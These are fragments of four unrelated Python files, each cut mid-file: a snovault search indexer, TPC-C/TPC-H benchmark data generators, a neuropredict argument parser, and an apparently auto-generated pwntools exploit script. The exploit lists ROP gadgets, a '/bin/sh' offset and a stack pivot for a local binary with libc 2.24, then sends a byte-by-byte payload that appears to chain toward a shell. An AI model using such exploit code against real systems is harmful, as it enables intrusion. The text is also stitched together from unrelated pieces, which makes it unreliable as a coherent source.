"SET TRANSACTION ISOLATION LEVEL SERIALIZABLE, READ ONLY, DEFERRABLE;"
"SELECT txid_snapshot_xmin(txid_current_snapshot());"
)
# DEFERRABLE prevents query cancelling due to conflicts but requires SERIALIZABLE mode
# which is not available in recovery.
xmin = query.scalar() # lowest xid that is still in progress
return xmin
class Indexer(object):
def __init__(self, registry):
self.es = registry[ELASTIC_SEARCH]
self.esstorage = registry[STORAGE]
self.index = registry.settings['snovault.elasticsearch.index']
self.queue_server = None
self.queue_server_backup = None
self.queue_worker = None
self.chunk_size = None
self.batch_size = None
self.worker_runs = []
if registry.settings.get('indexer'):
self._setup_queues(registry)
def check_log_indexing_times(self, update_infos):
if self.indexer_initial_log and not os.path.exists(self.indexer_initial_log_path):
log.warning('Logging indexing data to %s', self.indexer_initial_log_path)
counter = 0
with open(self.indexer_initial_log_path, 'w', encoding='utf-8') as file_handler:
for update_info in update_infos:
str_update_info = json.dumps(update_info, ensure_ascii=False)
file_handler.write(str_update_info)
counter += 1
log.warning('Logged %d uuids. One per line' % counter)
def _setup_queues(self, registry):
'''Init helper - Setup server and worker queues'''
self.index = registry.settings['snovault.elasticsearch.index']
self.indexer_initial_log = asbool(registry.settings.get('indexer_initial_log', False))
self.indexer_initial_log_path = registry.settings.get('indexer_initial_log_path')
try:
self.indexer_short_uuids = int(registry.settings.get('indexer_short_uuids'))
except Exception as ecp:
log.warning('indexer_short_uuids could not be cast to int. Defaulting to all.')
self.indexer_short_uuids = 0
queue_type = registry.settings.get('queue_type', None)
is_queue_server = asbool(registry.settings.get('queue_server'))
is_queue_worker = asbool(registry.settings.get('queue_worker'))
queue_options = self._get_queue_options(registry)
self.chunk_size = queue_options['chunk_size']
self.batch_size = queue_options['batch_size']
if is_queue_server:
cp_q_ops = queue_options.copy()
cp_q_ops['batch_size'] = cp_q_ops['get_size']
self.queue_server_backup = SimpleUuidServer(cp_q_ops)
if (
not queue_type or
queue_type == DEFAULT_QUEUE or
queue_type not in registry['available_queues']
):
self.queue_type = DEFAULT_QUEUE
self.queue_server = self.queue_server_backup
self.queue_server_backup = None
elif 'UuidQueue' in registry:
try:
queue_options['uuid_len'] = 36
self.queue_server = registry['UuidQueue'](
queue_options['queue_name'],
queue_type,
queue_options,
)
except Exception as exp: # pylint: disable=broad-except
log.warning(repr(exp))
log.warning(
'Failed to initialize UuidQueue. Switching to backup.'
)
self._serve_object_switch_queue()
else:
self.queue_type = queue_type
else:
log.error('No queue available for Indexer')
if self.queue_server and is_queue_worker:
self.queue_worker = self.queue_server.get_worker()
log.warning('Primary indexer queue type: %s', self.queue_type)
@staticmethod
def _get_queue_options(registry):
'''Init helper - Extract queue options from registry settings'''
queue_name = registry.settings.get('queue_name', 'indxQ')
queue_worker_processes = int(
registry.settings.get('queue_worker_processes', 1)
)
queue_worker_chunk_size = int(
registry.settings.get('queue_worker_chunk_size', 1024)
)
queue_worker_batch_size = int(
registry.settings.get('queue_worker_batch_size', 5000)
| |
<filename>benchmarks/htap/lib/helpers.py
import math
import random
from contextlib import AbstractContextManager
from dateutil.parser import isoparse
from typing import Iterator, Optional
import io
from datetime import datetime
import multiprocessing
# OLTP constants
# see http://www.tpc.org/tpc_documents_current_versions/pdf/tpc-c_v5.11.0.pdf page 62
# and to check resulting sizes after ingest, use figure 1.2.1 on page 11
# WARNING: most of the counts like CUST_PER_DIST and NUM_ORDERS are scaled with
# DIST_PER_WARE which makes the resulting row counts higher!
DIST_PER_WARE = 10
CUST_PER_DIST = 3000
NUM_ORDERS = 3000
MAX_ITEMS = 100000
STOCKS = 100000
# see 3.3.2.11 in tpc-c spec.
FIRST_UNPROCESSED_O_ID = 2101
# OLAP constants
# see section 4.2.2.12, page 81 of http://www.tpc.org/tpc_documents_current_versions/pdf/tpc-h_v2.17.2.pdf
TPCH_DATE_RANGE = [isoparse('1992-01-01'), isoparse('1998-12-31')]
WANTED_RANGE = TPCH_DATE_RANGE[1] - TPCH_DATE_RANGE[0]
NUM_SUPPLIERS = 10000
NUM_NATIONS = 62
NUM_REGIONS = 5
ALPHA_LOWER = list('abcdefghijklmnopqrstuvwxyz')
ALPHA_UPPER = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
NUM = list('0123456789')
ALPHA = ALPHA_LOWER + ALPHA_UPPER
ALPHA54 = ALPHA_LOWER + list('?@') + ALPHA_UPPER
ALPHANUM = ALPHA + NUM
ALPHANUM64 = ALPHA54 + NUM
NAMES = ['BAR', 'OUGHT', 'ABLE', 'PRI', 'PRES', 'ESE', 'ANTI', 'CALLY', 'ATION', 'EING']
# yapf: disable
NATIONS = [
# nation key, name, region key
(48, 'Australia', 4), (49, 'Belgium', 5), (50, 'Cameroon', 1),
(51, 'Denmark', 5), (52, 'Equador', 2), (53, 'France', 5),
(54, 'Germany', 5), (55, 'Hungary', 5), (56, 'Italy', 5),
(57, 'Japan', 3),
(65, 'Kenya', 1), (66, 'Lithuania', 5), (67, 'Mexico', 2),
(68, 'Netherlands', 5), (69, 'Oman', 1), (70, 'Portugal', 5),
(71, 'Qatar', 1), (72, 'Rwanda', 1), (73, 'Serbia', 5),
(74, 'Togo', 1), (75, 'United States', 2), (76, 'Vietnam', 3),
(77, 'Singapore', 3), (78, 'Cambodia', 3), (79, 'Yemen', 1),
(80, 'Zimbabwe', 1), (81, 'Argentina', 2), (82, 'Bolivia', 2),
(83, 'Canada', 2), (84, 'Dominican Republic', 2), (85, 'Egypt', 1),
(86, 'Finland', 5), (87, 'Ghana', 1), (88, 'Haiti', 2),
(89, 'India', 3), (90, 'Jamaica', 4),
( 97, 'Kazakhstan', 3), ( 98, 'Luxemburg', 5), ( 99, 'Marocco', 1),
(100, 'Norway', 5), (101, 'Poland', 5), (102, 'Peru', 2),
(103, 'Nicaragua', 2), (104, 'Romania', 5), (105, 'South Africa', 1),
(106, 'Thailand', 3), (107, 'United Kingdom', 5), (108, 'Venezuela', 2),
(109, 'Liechtenstein', 5), (110, 'Austria', 5), (111, 'Laos', 3),
(112, 'Zambia', 1), (113, 'Switzerland', 5), (114, 'China', 3),
(115, 'Papua New Guinea', 4), (116, 'East Timor', 4), (117, 'Bulgaria', 5),
(118, 'Brazil', 2), (119, 'Albania', 5), (120, 'Andorra', 5),
(121, 'Belize', 2), (122, 'Botswana', 1),
]
# yapf: enable
REGIONS = [(1, 'Africa'), (2, 'America'), (3, 'Asia'), (4, 'Australia'), (5, 'Europe')]
NOUNS = [
'foxes', 'ideas', 'theodolites', 'pinto beans', 'instructions', 'dependencies', 'excuses',
'platelets', 'asymptotes', 'courts', 'dolphins', 'multipliers', 'sauternes', 'warthogs',
'frets', 'dinos', 'attainments', 'somas', 'Tiresias', 'patterns', 'forges', 'braids',
'hockey players', 'frays', 'warhorses', 'dugouts', 'notornis', 'epitaphs', 'pearls',
'tithes', 'waters', 'orbits', 'gifts', 'sheaves', 'depths', 'sentiments', 'decoys',
'realms', 'pains', 'grouches', 'escapades'
]
VERBS = [
'sleep', 'wake', 'are', 'cajole', 'haggle', 'nag', 'use', 'boost', 'affix', 'detect',
'integrate', 'maintain', 'nod', 'was', 'lose', 'sublate', 'solve', 'thrash', 'promise',
'engage', 'hinder', 'print', 'x-ray', 'breach', 'eat', 'grow', 'impress', 'mold', 'poach',
'serve', 'run', 'dazzle', 'snooze', 'doze', 'unwind', 'kindle', 'play', 'hang', 'believe',
'doubt'
]
ADJECTIVES = [
'furious', 'sly', 'careful', 'blithe', 'quick', 'fluffy', 'slow', 'quiet', 'ruthless',
'thin', 'close', 'dogged', 'daring', 'brave', 'stealthy', 'permanent', 'enticing', 'idle',
'busy', 'regular', 'final', 'ironic', 'even', 'bold', 'silent'
]
ADVERBS = [
'sometimes', 'always', 'never', 'furiously', 'slyly', 'carefully', 'blithely', 'quickly',
'fluffily', 'slowly', 'quietly', 'ruthlessly', 'thinly', 'closely', 'doggedly', 'daringly',
'bravely', 'stealthily', 'permanently', 'enticingly', 'idly', 'busily', 'regularly',
'finally', 'ironically', 'evenly', 'boldly', 'silently'
]
PREPOSITIONS = [
'about', 'above', 'according to', 'across', 'after', 'against', 'along', 'alongside of',
'among', 'around', 'at', 'atop', 'before', 'behind', 'beneath', 'beside', 'besides',
'between', 'beyond', 'by', 'despite', 'during', 'except', 'for', 'from', 'in place of',
'inside', 'instead of', 'into', 'near', 'of', 'on', 'outside', 'over', 'past', 'since',
'through', 'throughout', 'to', 'toward', 'under', 'until', 'up', 'upon', 'without', 'with',
'within'
]
TERMINATORS = ['.', ';', ':', '?', '!', '--']
AUXILIARIES = [
'do', 'may', 'might', 'shall', 'will', 'would', 'can', 'could', 'should', 'ought to',
'must', 'will have to', 'shall have to', 'could have to', 'should have to', 'must have to',
'need to', 'try to'
]
WAREHOUSES_SF_RATIO = 20
class Random:
def __init__(self, seed):
self.rng = random.Random(seed)
self.C_255 = self.rng.randint(0, 256)
self.C_1023 = self.rng.randint(0, 1024)
self.C_8191 = self.rng.randint(0, 8192)
def nurand(self, A, x, y):
if A == 255:
C = self.C_255
elif A == 1023:
C = self.C_1023
elif A == 8191:
C = self.C_8191
return (((self.rng.randint(0, A + 1) | self.rng.randint(x, y + 1)) + C) % (y - x + 1)) + x
def decision(self, frac):
return self.rng.random() < frac
def randint_inclusive(self, low, high):
return self.rng.randint(low, high)
def sample(self):
return self.rng.random()
def gaussian(self, mean, variance):
return self.rng.gauss(mean, variance)
def shuffle(self, l):
self.rng.shuffle(l)
def from_list(self, l, length=1):
return self.rng.choices(l, k=length)
class OLTPText:
def __init__(self, random):
self.random = random
def lastname(self, num):
part_a = NAMES[math.floor(num / 100)]
part_b = NAMES[math.floor(num / 10) % 10]
part_c = NAMES[num % 10]
return part_a + part_b + part_c
def string(self, length, prefix=''):
return prefix + ''.join(self.random.from_list(ALPHA, length))
def numstring(self, length, prefix=''):
return prefix + ''.join(self.random.from_list(NUM, length))
def alnumstring(self, length, prefix=''):
return prefix + ''.join(self.random.from_list(ALPHANUM, length))
def alnum64string(self, length, prefix=''):
return prefix + ''.join(self.random.from_list(ALPHANUM64, length))
def data(self, min_length, max_length):
length = self.random.randint_inclusive(min_length, max_length)
return self.alnum64string(length)
def data_original(self, min_length, max_length):
original = 'ORIGINAL'
length = self.random.randint_inclusive(min_length, max_length - len(original))
alphanum64 = self.alnum64string(length)
l1 = self.random.randint_inclusive(0, length - len(original))
return '{}{}{}'.format(alphanum64[0:l1], original, alphanum64[l1:length])
def state(self):
return self.alnumstring(2).upper()
class OLAPText:
def __init__(self, random):
self.random = random
def random_noun(self):
return NOUNS[self.random.randint_inclusive(0, len(NOUNS) - 1)]
def random_verb(self):
return VERBS[self.random.randint_inclusive(0, len(VERBS) - 1)]
def random_adjective(self):
return ADJECTIVES[self.random.randint_inclusive(0, len(ADJECTIVES) - 1)]
def random_adverb(self):
return ADVERBS[self.random.randint_inclusive(0, len(ADVERBS) - 1)]
def random_preposition(self):
return PREPOSITIONS[self.random.randint_inclusive(0, len(PREPOSITIONS) - 1)]
def random_terminator(self):
return TERMINATORS[self.random.randint_inclusive(0, len(TERMINATORS) - 1)]
def random_auxiliary(self):
return AUXILIARIES[self.random.randint_inclusive(0, len(AUXILIARIES) - 1)]
def random_noun_phrase(self):
if self.random.decision(1 / 4):
return self.random_noun()
elif self.random.decision(1 / 4):
return f'{self.random_adjective()} {self.random_noun()}'
elif self.random.decision(1 / 4):
return f'{self.random_adjective()}, {self.random_adjective()} {self.random_noun()}'
else:
return f'{self.random_adverb()} {self.random_adjective()} {self.random_noun()}'
def random_verb_phrase(self):
if self.random.decision(1 / 4):
return self.random_verb()
elif self.random.decision(1 / 4):
return f'{self.random_auxiliary()} {self.random_verb()}'
elif self.random.decision(1 / 4):
return f'{self.random_verb()} {self.random_adverb()}'
else:
return f'{self.random_auxiliary()} {self.random_verb()} {self.random_adverb()}'
def random_prepositional_phrase(self):
return f'{self.random_preposition()} the {self.random_noun_phrase()}'
def random_sentence(self):
if self.random.decision(1 / 5):
return (
f'{self.random_verb_phrase()} {self.random_noun_phrase()} '
f'{self.random_terminator()}'
)
elif self.random.decision(1 / 5):
return (
f'{self.random_noun_phrase()} {self.random_verb_phrase()} '
f'{self.random_prepositional_phrase()} {self.random_terminator()}'
)
elif self.random.decision(1 / 5):
return (
f'{self.random_noun_phrase()} {self.random_verb_phrase()} '
f'{self.random_noun_phrase()} {self.random_terminator()}'
)
elif self.random.decision(1 / 5):
return (
f'{self.random_noun_phrase()} {self.random_prepositional_phrase()} '
f'{self.random_verb_phrase()} {self.random_noun_phrase()}'
f'{self.random_terminator()}'
)
else:
return (
f'{self.random_noun_phrase()} {self.random_prepositional_phrase()} '
f'{self.random_verb_phrase()} {self.random_prepositional_phrase()}'
f'{self.random_terminator()}'
)
def random_text(self, length):
text = ''
for i in range(25):
if i != 0:
text += ':'
text += self.random_sentence()
pos = self.random.randint_inclusive(0, len(text) - length)
return text[pos:pos + length]
def random_length_text(self, min_length, max_length):
random_length = self.random.randint_inclusive(min_length, max_length)
return self.random_text(random_length)
def random_customer_text(self, min_length, max_length, action):
total_length = self.random.randint_inclusive(min_length, max_length)
l1 = self.random.randint_inclusive(0, total_length - 8 - len(action))
l2 = self.random.randint_inclusive(0, total_length - l1 - 8 - len(action))
l3 = total_length - l1 - l2 - 8 - len(action)
return '{}Customer{}{}{}'.format(
self.random_text(l1), self.random_text(l2), action, self.random_text(l3)
)
def random_phone_number(self, key):
country = (key % 90) + 10
local1 = self.random.randint_inclusive(100, 999)
local2 = self.random.randint_inclusive(100, 999)
local3 = self.random.randint_inclusive(1000, 9999)
return '{}-{}-{}-{}'.format(country, local1, local2, local3)
class TimestampGenerator:
def __init__(self, start_date, random, scalar = 1.0):
# use the start date as value directly so that we can easily use shared counters
# as well by simply feeding in the right type
self.current = start_date
self.random = random
orders_per_warehouse = NUM_ORDERS * DIST_PER_WARE
date_range = TPCH_DATE_RANGE[1] - TPCH_DATE_RANGE[0]
self.increment = (date_range / orders_per_warehouse) * scalar
def next(self):
# support both process-local counters as well as multiprocessing value proxies
if isinstance(self.current, datetime):
self.current += self.increment * self.random.gaussian(mean=1, variance=0.05)
return self.current
elif isinstance(self.current, multiprocessing.sharedctypes.Synchronized):
with self.current.get_lock():
self.current.value += self.increment.total_seconds() * self.random.gaussian(mean=1, variance=0.05)
return datetime.fromtimestamp(self.current.value)
else:
raise ValueError("Unsupported datatype for TimestampGenerator")
# Taken from CPython 3.7 for compatibility with Python 3.6
class nullcontext(AbstractContextManager):
"""Context manager that does no additional processing.
Used as a stand-in for a normal context manager, when a particular
block of code is only sometimes used with a normal context manager:
cm = optional_cm if condition else nullcontext()
with cm:
# Perform operation, using optional_cm if condition is True
"""
def __init__(self, enter_result=None):
self.enter_result = enter_result
def __enter__(self):
return self.enter_result
def __exit__(self, *excinfo):
pass
# from https://hakibenita.com/fast-load-data-python-postgresql
class StringIteratorIO(io.TextIOBase):
def __init__(self, iter: Iterator[str]):
self._iter = iter
self._buff = ''
def readable(self) -> bool:
| |
#!/usr/bin/env python3
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
__libc_csu_init = 0x401360
__libc_csu_init_call_target = 0x402e48
__libc_csu_init_gadget1 = 0x4013b6
__libc_csu_init_gadget2 = 0x4013a0
canary = 0x0
got_leak_libc_fmt_str = 0x404660
libc_2_24_so_base = 0x0
libc_2_24_so_binsh = 0x161c19
libc_2_24_so_pop_rax_ret = 0x35fc8
libc_2_24_so_pop_rdi_ret = 0x1fc6a
libc_2_24_so_pop_rdx_ret = 0x1b92
libc_2_24_so_pop_rsi_ret = 0x1fc1a
libc_2_24_so_syscall = 0x26c7
pivot_dest = 0x404860
target_base = 0x0
target_leave_ret = 0x40134f
target_pop_rbp_ret = 0x4011dd
target_pop_rdi_ret = 0x4013c3
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# input state (offset = 1)
proc.send(b'\x80')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xb4')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xff')
# input state (offset = 1)
proc.send(b'\xfe')
# input state (offset = 1)
proc.send(b'\x8b')
# input state (offset = 1)
proc.send(b'\x7d')
# input state (offset = 1)
proc.send(b'\xf4')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x02')
# input state (offset = 1)
proc.send(b'\x92')
# input state (offset = 1)
proc.send(b'\xcc')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x51')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x98')
# input state (offset = 1)
proc.send(b'\x94')
# input state (offset = 1)
proc.send(b'\x7c')
# input state (offset = 1)
proc.send(b'\xa8')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xda')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x02')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x03')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x03')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x03')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xb6')
# input state (offset = 1)
proc.send(b'\x13')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x01')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x60')
# input state (offset = 1)
proc.send(b'\x48')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x48')
# input state (offset = 1)
proc.send(b'\x2e')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xa0')
# input state (offset = 1)
proc.send(b'\x13')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
| |
"""
neuropredict : easy and comprehensive predictive analysis.
"""
from __future__ import print_function
__all__ = ['run', 'cli', 'get_parser']
import argparse
import os
import sys
import textwrap
import traceback
import warnings
import matplotlib
import matplotlib.pyplot as plt
from sys import version_info
from os.path import join as pjoin, exists as pexists, abspath, realpath, basename
import numpy as np
from pyradigm import MLDataset
if version_info.major > 2:
# the order of import is very important to avoid circular imports
from neuropredict import __version__
from neuropredict import config_neuropredict as cfg
from neuropredict import rhst, visualize
from neuropredict.freesurfer import aseg_stats_subcortical, aseg_stats_whole_brain
from neuropredict.io import get_metadata, get_features, get_metadata_in_pyradigm, \
get_data_matrix, get_dir_of_dirs, get_pyradigm, get_arff, saved_dataset_matches
from neuropredict.utils import check_paths, uniq_combined_name, check_num_procs, sub_group_identifier, \
save_options, load_options, validate_feature_selection_size, make_dataset_filename, not_unspecified
else:
raise NotImplementedError('neuropredict requires Python 3+.')
def get_parser():
"Parser to specify arguments and their defaults."
parser = argparse.ArgumentParser(prog="neuropredict", formatter_class=argparse.RawTextHelpFormatter,
description='Easy, standardized and comprehensive predictive analysis.')
help_text_fs_dir = textwrap.dedent("""
Absolute path to ``SUBJECTS_DIR`` containing the finished runs of Freesurfer parcellation
Each subject will be queried after its ID in the metadata file.
E.g. ``--fs_subject_dir /project/freesurfer_v5.3``
\n \n """)
help_text_user_defined_folder = textwrap.dedent("""
List of absolute paths to user's own features.
Format: Each of these folders contains a separate folder for each subject (named after its ID in the metadata file)
containing a file called features.txt with one number per line.
All the subjects (in a given folder) must have the number of features (#lines in file).
Different parent folders (describing one feature set) can have different number of features for each subject,
but they must all have the same number of subjects (folders) within them.
Names of each folder is used to annotate the results in visualizations.
Hence name them uniquely and meaningfully, keeping in mind these figures will be included in your papers.
For example,
.. parsed-literal::
--user_feature_paths /project/fmri/ /project/dti/ /project/t1_volumes/
Only one of ``--pyradigm_paths``, ``user_feature_paths``, ``data_matrix_path`` or ``arff_paths`` options can be specified.
\n \n """)
help_text_pyradigm_paths = textwrap.dedent("""
Path(s) to pyradigm datasets.
Each path is self-contained dataset identifying each sample, its class and features.
\n \n """)
help_text_data_matrix = textwrap.dedent("""
List of absolute paths to text files containing one matrix of size N x p (num_samples x num_features).
Each row in the data matrix file must represent data corresponding to sample in the same row
of the meta data file (meta data file and data matrix must be in row-wise correspondence).
Name of this file will be used to annotate the results and visualizations.
E.g. ``--data_matrix_paths /project/fmri.csv /project/dti.csv /project/t1_volumes.csv ``
Only one of ``--pyradigm_paths``, ``user_feature_paths``, ``data_matrix_path`` or ``arff_paths`` options can be specified.
File format could be
- a simple comma-separated text file (with extension .csv or .txt): which can easily be read back with
numpy.loadtxt(filepath, delimiter=',')
or
- a numpy array saved to disk (with extension .npy or .numpy) that can read in with numpy.load(filepath).
One could use ``numpy.savetxt(data_array, delimiter=',')`` or ``numpy.save(data_array)`` to save features.
File format is inferred from its extension.
\n \n """)
help_text_arff_paths = textwrap.dedent("""
List of paths to files saved in Weka's ARFF dataset format.
Note:
- this format does NOT allow IDs for each subject.
- given feature values are saved in text format, this can lead to large files with high-dimensional data,
compared to numpy arrays saved to disk in binary format.
More info: https://www.cs.waikato.ac.nz/ml/weka/arff.html
\n \n """)
help_text_positive_class = textwrap.dedent("""
Name of the positive class (e.g. Alzheimers, MCI etc) to be used in calculation of area under the ROC curve.
Applicable only for binary classification experiments.
Default: class appearing last in order specified in metadata file.
\n \n """)
help_text_train_perc = textwrap.dedent("""
Percentage of the smallest class to be reserved for training.
Must be in the interval [0.01 0.99].
If sample size is sufficiently big, we recommend 0.5.
If sample size is small, or class imbalance is high, choose 0.8.
\n \n """)
help_text_num_rep_cv = textwrap.dedent("""
Number of repetitions of the repeated-holdout cross-validation.
The larger the number, more stable the estimates will be.
\n \n """)
help_text_sub_groups = textwrap.dedent("""
This option allows the user to study different combinations of classes in a multi-class (N>2) dataset.
For example, in a dataset with 3 classes CN, FTD and AD,
two studies of pair-wise combinations can be studied separately
with the following flag ``--sub_groups CN,FTD CN,AD``.
This allows the user to focus on few interesting subgroups depending on their dataset/goal.
Format: Different subgroups must be separated by space,
and each sub-group must be a comma-separated list of class names defined in the meta data file.
Hence it is strongly recommended to use class names without any spaces, commas, hyphens and special characters,
and ideally just alphanumeric characters separated by underscores.
Any number of subgroups can be specified, but each subgroup must have atleast two distinct classes.
Default: ``'all'``, leading to inclusion of all available classes in a all-vs-all multi-class setting.
\n \n """)
help_text_metadata_file = textwrap.dedent("""
Abs path to file containing metadata for subjects to be included for analysis.
At the minimum, each subject should have an id per row followed by the class it belongs to.
E.g.
.. parsed-literal::
sub001,control
sub002,control
sub003,disease
sub004,disease
\n \n """)
help_text_feature_selection = textwrap.dedent("""Number of features to select as part of feature selection.
Options:
- 'tenth'
- 'sqrt'
- 'log2'
- 'all'
Default: \'tenth\' of the number of samples in the training set.
For example, if your dataset has 90 samples, you chose 50 percent for training (default),
then Y will have 90*.5=45 samples in training set, leading to 5 features to be selected for taining.
If you choose a fixed integer, ensure all the feature sets under evaluation have atleast that many features.
\n \n """)
help_text_gs_level = textwrap.dedent("""
Flag to specify the level of grid search during hyper-parameter optimization on the training set.
Allowed options are : 'none', 'light' and 'exhaustive', in the order of how many values/values will be optimized.
More parameters and more values demand more resources and much longer time for optimization.
The 'light' option tries to "folk wisdom" to try least number of values (no more than one or two),
for the parameters for the given classifier. (e.g. a lage number say 500 trees for a random forest optimization).
The 'light' will be the fastest and should give a "rough idea" of predictive performance.
